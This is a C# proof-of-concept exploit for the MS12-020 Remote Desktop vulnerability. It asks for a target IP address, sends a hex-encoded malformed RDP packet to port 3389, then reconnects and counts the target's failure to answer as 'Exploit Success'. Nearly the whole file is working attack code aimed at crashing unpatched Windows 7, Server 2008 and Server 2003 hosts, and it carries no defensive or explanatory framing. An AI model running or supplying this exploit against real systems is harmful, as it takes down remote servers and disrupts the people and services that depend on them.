//ms12-020 "chinese shit" PoC
//Tested On Win7 Ultimate & Win 2008 Server & Win 2003 Serrver R2
//C# Coded By Yomi :D
using System;
using System.Net;
using System.Net.Sockets;
namespace RDP_PoC_Exploit
{
class Program
{
public static readonly string str_shell =
"030000130ee00000" +"0000000100080000" +"000000030001d602" +"f0807f6582019404" +"01010401010101ff" +"3019020400000000" +
"0204000000020204" +"0000000002040000" +"0001020400000000" +"0204000000010202" +"ffff020400000002" +"3019020400000001" +
"0204000000010204" +"0000000102040000" +"0001020400000000" +"0204000000010202" +"0420020400000002" +"301c0202ffff0202" +
"fc170202ffff0204" +"0000000102040000" +"0000020400000001" +"0202ffff02040000" +"0002048201330005" +"00147c0001812a00" +
"0800100001c00044" +"756361811c01c0d8" +"00040008008002e0" +"0101ca03aa090400" +"00ce0e000048004f" +"0053005400000000" +
"0000000000000000" +"0000000000000000" +"0000000000040000" +"00000000000c0000" +"0000000000000000" +"0000000000000000" +
"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +"0000000000000000" +
"0001ca0100000000" +"0010000700010030" +"0030003000300030" +"002d003000300030" +"002d003000300030" +"0030003000300030" +
"002d003000300030" +"0030003000000000" +"0000000000000000" +"0000000000000000" +"000000000004c00c" +"000d000000000000" +
"0002c00c001b0000" +"000000000003c02c" +"0003000000726470" +"6472000000000080" +"80636c6970726472" +"000000a0c0726470" +
"736e640000000000" +"c00300000c02f080" +"0401000100030000" +"0802f08028030000" +"0c02f08038000603" +"ef0300000c02f080" +
"38000603eb030000" +"0c02f08038000603" +"ec0300000c02f080" +"38000603ed030000" +"0c02f08038000603" +"ee0300000b06d000" +
"00123400";
static void Main(string[] args)
{
Console.WriteLine("Enter Remote IP : <192.168.1.1> <Enter To Start :D>");
string str_IP = Console.ReadLine();
Exploit_it(str_IP);
}
static private void Exploit_it(string IP)
{
try
{
Socket _soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
IPAddress remoteIPAddress = IPAddress.Parse(IP);
IPEndPoint remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389);
_soc.Connect(remoteEndPoint);
Console.WriteLine(".............. Creating Paylod ");
byte[] buff = HexString2Bytes(str_shell);
Console.WriteLine(".............. Sending Payload ");
_soc.Send(buff);
Console.WriteLine(".............. Payoad Sent ! ");
Console.WriteLine(".............. Reconnecting To Remote Target ! ");
_soc.Disconnect(true);
try
{
Socket re_soc = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP);
IPAddress re_remoteIPAddress = IPAddress.Parse(IP);
IPEndPoint re_remoteEndPoint = new IPEndPoint(remoteIPAddress, 3389);
re_soc.Connect(re_remoteEndPoint);
Console.WriteLine(".............. Remote Host Responding ! :( ");
Console.WriteLine(".............. Exploit Faild ! :( ");
}
catch (System.Net.Sockets.SocketException Exp)
{
Console.WriteLine(".............. Remote Host Not Response ! :D");
Console.WriteLine(".............. Exploit Success !! \r\nSocket Error : [ " + Exp.Message + " ]");
}
Console.WriteLine(".............. Exploit Done ! \r\n.............. Check Result Of It !");
}
catch (System.Net.Sockets.SocketException se)
{
Console.WriteLine(".............. Exploit Faild !");
Console.WriteLine("Socket Error : [ " + se.Message + " ]");
}
}
static private byte[] HexString2Bytes(string hexString)
{
int len = hexString.Length;
if (len % 2 == 1) throw new Exception("Invalid HEX String Length !");
int len_half = len / 2;
byte[] arr_b = new byte[len_half];
for (int i = 0; i != len_half; i++)
{
arr_b[i] = (byte)Int32.Parse(hexString.Substring(i * 2, 2), System.Globalization.NumberStyles.HexNumber);
}
return arr_b;
}
}
}
